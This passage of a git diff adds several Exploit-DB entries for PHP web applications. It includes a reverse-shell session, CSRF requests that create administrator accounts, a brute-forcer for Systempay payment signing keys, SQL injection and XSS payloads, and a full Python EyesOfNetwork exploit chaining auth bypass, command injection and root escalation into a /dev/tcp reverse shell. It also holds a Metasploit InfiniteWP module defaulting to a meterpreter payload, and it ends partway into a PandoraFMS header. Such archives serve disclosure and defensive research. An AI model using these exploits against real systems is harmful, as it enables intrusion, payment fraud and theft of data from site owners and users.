+    $'http://localhost/[PATH]/admin/user/controller.php?action=photos'
+# 
+curl -i -s -k -X $'GET' \
+    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
+    $'http://localhost/[PATH]/admin/user/photos/exp.php'
+# 
+root@ihsan:~/ExploitDB# nc -nlvp 6666
+Ncat: Version 7.80 ( https://nmap.org/ncat )
+Ncat: Listening on :::6666
+Ncat: Listening on 0.0.0.0:6666
+Ncat: Connection from 192.168.1.104.
+Ncat: Connection from 192.168.1.104:35574.
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/48016.txt b/exploits/php/webapps/48016.txt
new file mode 100644
index 000000000..7fde420c7
--- /dev/null
+++ b/exploits/php/webapps/48016.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
+# Dork: N/A
+# Date: 2020-02-06
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC: 
+# 1)
+# Add User..
+# 
+POST /admin/user/controller.php?action=add HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 106
+Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+user_id=1&deptid=&U_NAME=hacker&deptid=&U_USERNAME=hacker&deptid=&U_PASS=hacker&U_ROLE=Administrator&save=
+# 
+
+# POC: 
+# 2)
+# Edit User..
+# 
+POST /admin/user/controller.php?action=edit HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 121
+Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+user_id=1&deptid=&U_NAME=hacker_edit&deptid=&U_USERNAME=hacker_edit&deptid=&U_PASS=hacker_edit&U_ROLE=Administrator&save=
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/48017.php b/exploits/php/webapps/48017.php
new file mode 100644
index 000000000..7ec568921
--- /dev/null
+++ b/exploits/php/webapps/48017.php
@@ -0,0 +1,98 @@
+# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force
+# Author: live3
+# Date: 2020-02-05
+# Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
+# Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/
+# Tested on: MacOs
+# Version: ALL
+
+<?php
+/**
+ * 
+ * INFORMATION
+ * Exploit Title:        Ecommerce Systempay decode secret production KEY / Brute Force
+ * Author:               live3
+ * Date:                 2020-02-05
+ * Vendor Homepage:      https://paiement.systempay.fr/doc/fr-FR/
+ * Tested on:            MacOs
+ * Version:              ALL
+ * Prerequisite:         Find a ecommerce who is using Systempay AND SHA1 to crypt signature. 
+ * Put some product on cart and choose systempay for payment method.
+ * get all data from post sent to https://paiement.systempay.fr/vads-payment/
+ * keep signature as reference and all vads fields to create new signature.
+ * Use script to make a brute force on Secret product key (16 char length)
+ *
+ * Usage: Once you have the production KEY all modifications on form data will be accepted by systempay ! (You will just generate new signature with your changes)
+ * You will be able to generate a success payment return !
+ *
+ * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
+ * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
+ * 
+ */
+
+// Set the start number you want (16 char length)
+$last_key_check = '1000000000000000';
+
+// Assign var
+$array_key = array();
+$sentence = '';
+$how_many_key_to_check_for_loop = 10;
+
+// Put here signature extract from POST DATA
+// Example of SHA1 from string : test
+$signature_from_post = 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3';
+
+// Copy paste your content decoded of POST DATA
+$form_data = '
+vads_field_1: VALUE1
+vads_field_2: VALUE2
+// AND ALL OTHER FIELDS...
+';
+
+$array = explode(PHP_EOL, $form_data);
+
+foreach ($array as $data) {
+    if ($data != '') {
+        $elements = explode(': ', $data);
+        if (!empty($elements)) {
+            $array_key[trim($elements[0])] = $elements[1];
+        }
+    }
+}
+
+ksort($array_key);
+
+foreach ($array_key as $value) {
+    $sentence .= $value . '+';
+}
+
+
+echo 'Signature from POST DATA : '.$signature_from_post.'<br/>';
+
+$found = false;
+$get_key = '';
+
+// first check
+if (sha1($sentence.$last_key_check) != $signature_from_post) {
+    for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) {
+        $get_key = $i;
+        if (sha1($sentence.$i) == $signature_from_post) {
+            echo 'Key found : '.$i.'<br/>';
+            $found = true;
+            break;
+        }
+    }
+} else {
+    $found = true;
+}
+
+
+if ($found) {
+    $test_sha = sha1($sentence.$get_key);
+    echo 'Signature calc : '.$test_sha.'<br/><hr/>';
+} else {
+    echo 'Last key check : '.$get_key.'<br/><hr/>';
+}
+
+
+echo 'Your sequence : '.$sentence.'<br/>';
\ No newline at end of file
diff --git a/exploits/php/webapps/48022.txt b/exploits/php/webapps/48022.txt
new file mode 100644
index 000000000..4fddfce25
--- /dev/null
+++ b/exploits/php/webapps/48022.txt
@@ -0,0 +1,44 @@
+# Exploit Title: QuickDate 1.3.2 - SQL Injection
+# Dork: N/A
+# Date: 2020-02-07
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://quickdatescript.com/
+# Version: 1.3.2
+# Tested on: Linux
+# CVE: N/A
+
+# POC: 
+# 1)
+# 
+POST /find_matches HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 425
+Cookie: quickdating=a50b670982b01b4f0608a60217309d11; mode=night; JWT=a0823ac00ff28243d0c8caa841ebacd55bbf6d40f571d45bfb0f504e8b0b13be16222ee080568613ca7be8306ecc3f5fa30ff2c41e64fa7b
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+_located=-7 UNION ALL SELECT%2BCONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113-- -
+# 
+# 
+HTTP/1.1 200 OK
+Date: Thu, 06 Feb 2020 15:05:34 GMT
+Server: Apache
+Connection: Keep-alive, close
+Access-Control-Allow-Origin: *
+Access-Control-Max-Age: 3600
+Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: User-Agent
+Content-Type: application/json; charset=UTF-8
+Content-Length: 3844
+
+{"status":200,"page":1,"post":"{\"_located\":\"-7 UNION AL...... class=\"btn waves-effect dislike _dislike_textdate_main@localhost : date_main : 10.2.31-MariaDB\".......","where":"","message":"OK","can_send":1}
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/48024.txt b/exploits/php/webapps/48024.txt
new file mode 100644
index 000000000..90b6ed94b
--- /dev/null
+++ b/exploits/php/webapps/48024.txt
@@ -0,0 +1,38 @@
+# Exploit Title: PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection
+# Google Dork: intitle: "PackWeb Formap E-learning"
+# Date: 2020-02-07
+# Exploit Author: Amel BOUZIANE-LEBLOND
+# Vendor Homepage: https://www.ediser.com/
+# Software Link: https://www.ediser.com/98517-formation-en-ligne
+# Version: v1.0
+# Tested on: Linux
+# CVE : N/A
+
+# Description:
+# The PackWeb Formap E-learning application from EDISER is vulnerable to
+# SQL injection via the 'NumCours' parameter on the eleve_cours.php
+
+==================== 1. SQLi ====================
+
+http://localhost/eleve_cours.php?NumCours=[SQLI]
+
+The 'NumCours' parameter is vulnerable to SQL injection.
+
+GET parameter 'NumCours' is vulnerable.
+
+---
+Parameter: #1* (URI)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause
+    Payload: http://localhost/eleve_cours.php?NumCours=-9758' OR 6342=6342-- rSaq&static=1
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
+    Payload: http://localhost/eleve_cours.php?NumCours=' AND SLEEP(5)-- rGcs&static=1
+
+    Type: UNION query
+    Title: MySQL UNION query (47) - 1 column
+    Payload: http://localhost/eleve_cours.php?NumCours=' UNION ALL SELECT CONCAT(0x7176707171,0x58794e58714e52434d7879444262574a506d6f41526e636444674d5a6863667a6943517841654d54,0x717a7a6a71)#&static=1
+---
+[INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12
\ No newline at end of file
diff --git a/exploits/php/webapps/48025.txt b/exploits/php/webapps/48025.txt
new file mode 100644
index 000000000..058b798f8
--- /dev/null
+++ b/exploits/php/webapps/48025.txt
@@ -0,0 +1,171 @@
+# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution
+# Date: 2020-02-01
+# Exploit Author: Clément Billac
+# Vendor Homepage: https://www.eyesofnetwork.com/
+# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
+# Version: 5.3
+# CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656
+
+#!/bin/env python3
+# coding: utf8
+#
+#
+# CVE-2020-8654 - Discovery module to allows to run arbitrary OS commands
+#                 We were able to run the 'id' command with the following payload in the target field : ';id #'.
+#
+# CVE-2020-8655 - LPE via nmap NSE script
+#                 As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
+#                 nmap version 6.40 is used and doesn't have the -c and -e options.
+#
+# CVE-2020-8656 - SQLi in API in getApiKey function on 'username' field
+#                 PoC: /eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '
+#                 Auth bypass: /eonapi/getApiKey?&username=' union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8 or '&password=h4knet
+
+# Python imports
+import sys, requests, json, os, argparse, socket
+from bs4 import BeautifulSoup
+
+# Text colors
+txt_yellow = "\033[01;33m"
+txt_blue = "\033[01;34m"
+txt_red = "\033[01;31m"
+txt_green = "\033[01;32m"
+txt_bold = "\033[01;01m"
+txt_reset = "\033[00m"
+txt_info = txt_blue + "[*] " + txt_reset
+txt_success = txt_green + "[+] " + txt_reset
+txt_warn = txt_yellow + "[!] " + txt_reset
+txt_err = txt_red + "[x] " + txt_reset
+
+# Banner
+banner = (txt_bold + """
++-----------------------------------------------------------------------------+
+| EyesOfNetwork 5.3 RCE (API v2.4.2)                                          |
+| 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m                                   |
+|                                                                             |
+| Examples:                                                                   |
+| eonrce.py -h                                                                |
+| eonrce.py http(s)://EyesOfNetwork-URL                                       |
+| eonrce.py https://eon.thinc.local -ip 10.11.0.182 -port 3128                |
+| eonrce.py https://eon.thinc.local -ip 10.11.0.182 -user pentest2020         |
++-----------------------------------------------------------------------------+
+""" + txt_reset)
+
+# Arguments Parser
+parser = argparse.ArgumentParser("eonrce", formatter_class=argparse.RawDescriptionHelpFormatter, usage=banner)
+parser.add_argument("URL", metavar="URL", help="URL of the EyesOfNetwork server")
+parser.add_argument("-ip", metavar="IP", help="Local IP to receive reverse shell", default=socket.gethostbyname(socket.gethostname()))
+parser.add_argument("-port", metavar="Port", type=int, help="Local port to listen", default=443)
+parser.add_argument("-user", metavar="Username", type=str, help="Name of the new user to create", default='h4ker')
+parser.add_argument("-password", metavar="Password", type=str, help="Password of the new user", default='net_was_here')
+args = parser.parse_args()
+
+# HTTP Requests config
+requests.packages.urllib3.disable_warnings()
+baseurl = sys.argv[1].strip('/')
+url = baseurl
+useragent = 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37'
+
+# Admin user creation variables
+new_user = args.user
+new_pass = args.password
+
+# Executed command
+# The following payload performs both the LPE and the reverse shell in a single command.
+# It creates a NSE script in /tmp/h4k wich execute /bin/sh with reverse shell and then perform the nmap scan on localhost with the created NSE script.
+# Readable PoC: ;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
+ip = args.ip
+port = str(args.port)
+cmd = '%3Becho+%22local+os+%3D+require+%5C%22os%5C%22+hostrule%3Dfunction%28host%29+os.execute%28%5C%22%2Fbin%2Fsh+-i+%3E%26+%2Fdev%2Ftcp%2F' + ip + '%2F' + port + '+0%3E%261%5C%22%29+end+action%3Dfunction%28%29+end%22+%3E+%2Ftmp%2Fh4k%3Bsudo+%2Fusr%2Fbin%2Fnmap+localhost+-p+1337+-script+%2Ftmp%2Fh4k+%23'
+
+# Exploit banner
+print (txt_bold,"""+-----------------------------------------------------------------------------+
+| EyesOfNetwork 5.3 RCE (API v2.4.2)                                          |
+| 02/2020 - Clément Billac \033[01;34mTwitter: @h4knet\033[00m                                  |
++-----------------------------------------------------------------------------+
+""", txt_reset, sep = '')
+
+# Check if it's a EyesOfNetwork login page.
+r = requests.get(baseurl, verify=False, headers={'user-agent':useragent})
+if r.status_code == 200 and r.text.find('<title>EyesOfNetwork</title>') != -1 and r.text.find('form action="login.php" method="POST">') != -1:
+	print(txt_info, "EyesOfNetwork login page found", sep = '')
+else:
+	print(txt_err, 'EyesOfNetwork login page not found', sep = '')
+	quit()
+
+# Check for accessible EON API
+url = baseurl + '/eonapi/getApiKey'
+r = requests.get(url, verify=False, headers={'user-agent':useragent})
+if r.status_code == 401 and 'api_version' in r.json().keys() and 'http_code' in r.json().keys():
+	print(txt_info, 'EyesOfNetwork API page found. API version: ',txt_bold , r.json()['api_version'], txt_reset, sep = '')
+else:
+	print(txt_warn, 'EyesOfNetwork API page not found', sep = '')
+	quit()
+
+# SQL injection with authentication bypass
+url = baseurl + '/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet'
+r = requests.get(url, verify=False, headers={'user-agent':useragent})
+if r.status_code == 200 and 'EONAPI_KEY' in r.json().keys():
+	print(txt_success, 'Admin user key obtained: ', txt_bold, r.json()['EONAPI_KEY'], txt_reset, sep = '')
+else:
+	print(txt_err, 'The host seems patched or unexploitable', sep = '')
+	print(txt_warn, 'Did you specified http instead of https in the URL ?', sep = '')
+	print(txt_warn, 'You can check manually the SQLi with the following payload: ', txt_bold, "/eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '", txt_reset, sep = '')
+	quit()
+
+# Adding new administrator
+url = sys.argv[1].strip('/') + '/eonapi/createEonUser?username=admin&apiKey=' + r.json()['EONAPI_KEY']
+r = requests.post(url, verify=False, headers={'user-agent':useragent}, json={"user_name":new_user,"user_group":"admins","user_password":new_pass})
+if r.status_code == 200 and 'result' in r.json().keys():
+	if r.json()['result']['code'] == 0 and 'SUCCESS' in  r.json()['result']['description']:
+		id = r.json()['result']['description'].split('ID = ', 1)[1].split(']')[0]
+		print(txt_success, 'New user ', txt_bold, new_user, txt_reset, ' successfully created. ID:', txt_bold,  id, txt_reset, sep = '')
+
+	elif r.json()['result']['code'] == 1:
+		if ' already exist.' in  r.json()['result']['description']:
+			print(txt_warn, 'The user ', txt_bold, new_user, txt_reset, ' already exists', sep = '')
+		else:
+			print(txt_err, 'An error occured while querying the API. Unexpected description message: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '')
+			quit()
+	else:
+		print(txt_err, 'An error occured while querying the API. Unepected result code. Description: ', txt_bold, r.json()['result']['description'], txt_reset, sep = '')
+		quit()
+else:
+	print(txt_err, 'An error occured while querying the API. Missing result value in JSON response or unexpected HTTP status response', sep = '')
+	quit()
+
+# Authentication with our new user
+url = baseurl + '/login.php'
+auth_data = 'login=' + new_user + '&mdp=' +new_pass
+auth_req = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, data=auth_data)
+if auth_req.status_code == 200 and 'Set-Cookie' in auth_req.headers:
+	print(txt_success, 'Successfully authenticated', sep = '')
+else:
+	print(txt_err, 'Error while authenticating. We expect to receive Set-Cookie headers uppon successful authentication', sep = '')
+	quit()
+
+# Creating Discovery job
+url = baseurl + '/lilac/autodiscovery.php'
+job_command = 'request=autodiscover&job_name=Internal+discovery&job_description=Internal+EON+discovery+procedure.&nmap_binary=%2Fusr%2Fbin%2Fnmap&default_template=&target%5B2%5D=' + cmd
+r = requests.post(url, verify=False, headers={'user-agent':useragent,'Content-Type':'application/x-www-form-urlencoded'}, cookies=auth_req.cookies, data=job_command)
+if r.status_code == 200 and r.text.find('Starting...') != -1:
+	job_id = str(BeautifulSoup(r.content, "html.parser").find(id="completemsg")).split('?id=', 1)[1].split('&rev')[0]
+	print(txt_success, 'Discovery job successfully created with ID: ', txt_bold, job_id, txt_reset, sep = '')
+else:
+	print(txt_err, 'Error while creating the discovery job', sep = '')
+	quit()
+
+# Launching listener
+print(txt_info, 'Spawning netcat listener:', txt_bold)
+nc_command = '/usr/bin/nc -lnvp' + port + ' -s ' + ip
+os.system(nc_command)
+print(txt_reset)
+
+# Removing job
+url = baseurl + '/lilac/autodiscovery.php?id=' + job_id + '&delete=1'
+r = requests.get(url, verify=False, headers={'user-agent':useragent}, cookies=auth_req.cookies)
+if r.status_code == 200 and r.text.find('Removed Job') != -1:
+	print(txt_info, 'Job ', job_id, ' removed', sep = '')
+else:
+	print(txt_err, 'Error while removing the job', sep = '')
+	quit()
\ No newline at end of file
diff --git a/exploits/php/webapps/48030.txt b/exploits/php/webapps/48030.txt
new file mode 100644
index 000000000..47adcefad
--- /dev/null
+++ b/exploits/php/webapps/48030.txt
@@ -0,0 +1,37 @@
+# Exploit Title: LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting
+# Date: 2020-01-14
+# Vendor Homepage: https://www.learndash.com
+# Vendor Changelog: https://learndash.releasenotes.io/release/uCskc-version-312
+# Exploit Author: Jinson Varghese Behanan
+# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/
+# Author Homepage: https://www.jinsonvarghese.com
+# Version: 3.0.0 - 3.1.1
+# CVE : CVE-2020-7108
+
+1. Description
+
+LearnDash is one of the most popular and easiest to use WordPress LMS plugins in the market. It allows users to easily create courses and sell them online and boasts a large customer base. The plugin allows users to search for courses they have subscribed to using the [ld_profile] search field, which was found to be vulnerable to reflected cross site scripting. All WordPress websites using LearnDash version 3.0.0 through 3.1.1 are affected.
+
+2. Proof of Concept
+
+Once the user is logged in to the WordPress website where the vulnerable LearnDash plugin is installed, the XSS payload can be inserted into the Search Your Courses box. The payload gets executed because the user input is not properly validated. As a result, passing the XSS payload as a query string in the URL will also execute the payload.
+
+[wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+An attacker can modify the above URL and use an advanced payload that could help him/her in performing malicious actions.
+
+GET /wp-admin/admin-ajax.php?action=ld30_ajax_profile_search&shortcode_instance%5Buser_id%5D=1&shortcode_instance%5Bper_page%5D=20&shortcode_instance%5Border%5D=DESC&shortcode_instance%5Borderby%5D=ID&shortcode_instance%5Bcourse_points_user%5D=yes&shortcode_instance%5Bexpand_all%5D=false&shortcode_instance%5Bprofile_link%5D=true&shortcode_instance%5Bshow_header%5D=yes&shortcode_instance%5Bshow_quizzes%5D=true&shortcode_instance%5Bshow_search%5D=yes&shortcode_instance%5Bquiz_num%5D=20&shortcode_instance%5Bpaged%5D=1&shortcode_instance%5Bs%5D=&ld-profile-search=%3Cscript%3Ealert(123)%3C%2Fscript%3E HTTP/1.1
+Host: learndashtesting.com
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://learndashtesting.com/my-account-2/
+Cookie: wordpress_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7C7ec9ebfd67acdbc669395821f620198e67cb74780c9a8db63923b528aa661acd; PHPSESSID=e7c30849dbdab6f1cafcccef0ad7e7a0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7Cfcf64acbc9b6ba7aaafb9c3b077581347d65ca8e010135cc232dcfc0335ec6d8; wordpress_cf_adm_use_adm=1; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg; wp-settings-time-1=1581331685
+
+3. Timeline
+
+Vulnerability reported to the LearnDash team – January 14, 2020
+LearnDash version 3.1.2 containing the fix released – January 14, 2020
\ No newline at end of file
diff --git a/exploits/php/webapps/48042.txt b/exploits/php/webapps/48042.txt
new file mode 100644
index 000000000..6531b646c
--- /dev/null
+++ b/exploits/php/webapps/48042.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2020-02-10
+# Exploit Author: Sayak Naskar
+# Vendor Homepage: https://vanillaforums.com/en/
+# Version: 2.6.3
+# Tested on: Windows, Linux
+# CVE : CVE-2020-8825
+
+A Stored xss was found in Vanillaforum 2.6.3 .
+
+index.php?p=/dashboard/settings/branding
+
+# Proof of Concept:
+
+An attacker will insert a payload on branding section. So, whenever an user will open the branding section then attacker automatically get all sensitive information of the user.
\ No newline at end of file
diff --git a/exploits/php/webapps/48047.rb b/exploits/php/webapps/48047.rb
new file mode 100755
index 000000000..75644cd75
--- /dev/null
+++ b/exploits/php/webapps/48047.rb
@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress InfiniteWP Client Authentication Bypass',
+      'Description'    => %q{
+        This module exploits an authentication bypass in the WordPress
+        InfiniteWP Client plugin to log in as an administrator and execute
+        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.
+
+        The module will attempt to retrieve the original PLUGIN_FILE contents
+        and restore them after payload execution. If VerifyContents is set,
+        which is the default setting, the module will check to see if the
+        restored contents match the original.
+
+        Note that a valid administrator username is required for this module.
+
+        WordPress >= 4.9 is currently not supported due to a breaking WordPress
+        API change. Tested against 4.8.3.
+      },
+      'Author'         => [
+        'WebARX', # Discovery
+        'wvu'     # Module
+      ],
+      'References'     => [
+        ['WPVDB', '10011'],
+        ['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
+        ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
+        ['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
+      ],
+      'DisclosureDate' => '2020-01-14',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Privileged'     => false,
+      'Targets'        => [['InfiniteWP Client < 1.9.4.5', {}]],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
+    ))
+
+    register_options([
+      OptString.new('USERNAME',    [true, 'WordPress username', 'admin']),
+      OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('VerifyContents', [false, 'Verify file contents', true])
+    ])
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def plugin_file
+    datastore['PLUGIN_FILE']
+  end
+
+  def plugin_uri
+    normalize_uri(wordpress_url_plugins, plugin_file)
+  end
+
+  def check
+    unless wordpress_and_online?
+      return CheckCode::Unknown('Is the site online and running WordPress?')
+    end
+
+    unless (version = wordpress_version)
+      return CheckCode::Unknown('Could not detect WordPress version')
+    end
+
+    if Gem::Version.new(version) >= Gem::Version.new('4.9')
+      return CheckCode::Safe("WordPress #{version} is an unsupported target")
+    end
+
+    vprint_good("WordPress #{version} is a supported target")
+
+    check_version_from_custom_file(
+      normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'),
+      /^= ([\d.]+)/,
+      '1.9.4.5'
+    )
+  end
+
+  # https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php
+  def auth_bypass
+    json = {
+      'iwp_action' => %w[add_site readd_site].sample,
+      'params'     => {'username' => username}
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => wordpress_url_backend,
+      'data'   => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
+    )
+
+    unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
+      fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
+    end
+
+    print_good("Successfully obtained cookie for #{username}")
+    vprint_status("Cookie: #{cookie}")
+
+    cookie
+  end
+
+  def exploit
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    print_status("Bypassing auth for #{username} at #{full_uri}")
+    unless (@cookie = auth_bypass).include?('wordpress_logged_in')
+      fail_with(Failure::NoAccess, "Could not log in as #{username}")
+    end
+
+    print_good("Successfully logged in as #{username}")
+    write_and_exec_payload
+  end
+
+  def write_and_exec_payload
+    print_status("Retrieving original contents of #{plugin_uri}")
+    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)
+
+    unless contents
+      fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}")
+    end
+
+    print_good("Successfully retrieved original contents of #{plugin_uri}")
+    vprint_status('Contents:')
+    print(contents)
+
+    print_status("Overwriting #{plugin_uri} with payload")
+    unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie)
+      fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}")
+    end
+
+    print_good("Successfully overwrote #{plugin_uri} with payload")
+
+    print_status("Requesting payload at #{plugin_uri}")
+    send_request_cgi({
+      'method' => 'GET',
+      'uri'    => plugin_uri
+    }, 0)
+
+    restore_contents(contents)
+  end
+
+  def restore_contents(og_contents)
+    print_status("Restoring original contents of #{plugin_uri}")
+    unless wordpress_edit_plugin(plugin_file, og_contents, @cookie)
+      fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}")
+    end
+
+    return unless datastore['VerifyContents']
+
+    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)
+
+    unless contents == og_contents
+      fail_with(Failure::UnexpectedReply,
+                "Current contents of #{plugin_uri} DO NOT match original!")
+    end
+
+    print_good("Current contents of #{plugin_uri} match original!")
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/48064.py b/exploits/php/webapps/48064.py
new file mode 100755
index 000000000..24fff0d58
--- /dev/null
+++ b/exploits/php/webapps/48064.py
@@ -0,0 +1,77 @@
+# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
+# Date: 2020-02-12
+# Exploit Author: Engin Demirbilek
+# Vendor homepage: http://pandorafms.org/
+# Version: 7.0
+# Software link: https://pandorafms.org/features/free-download-monitoring-software/
+# Tested on: CentOS
+# CVE: CVE-2020-8947
+
+#!/bin/python
+'''
+PANDORAFMS 7.0 Authenticated Remote Code Execution x4
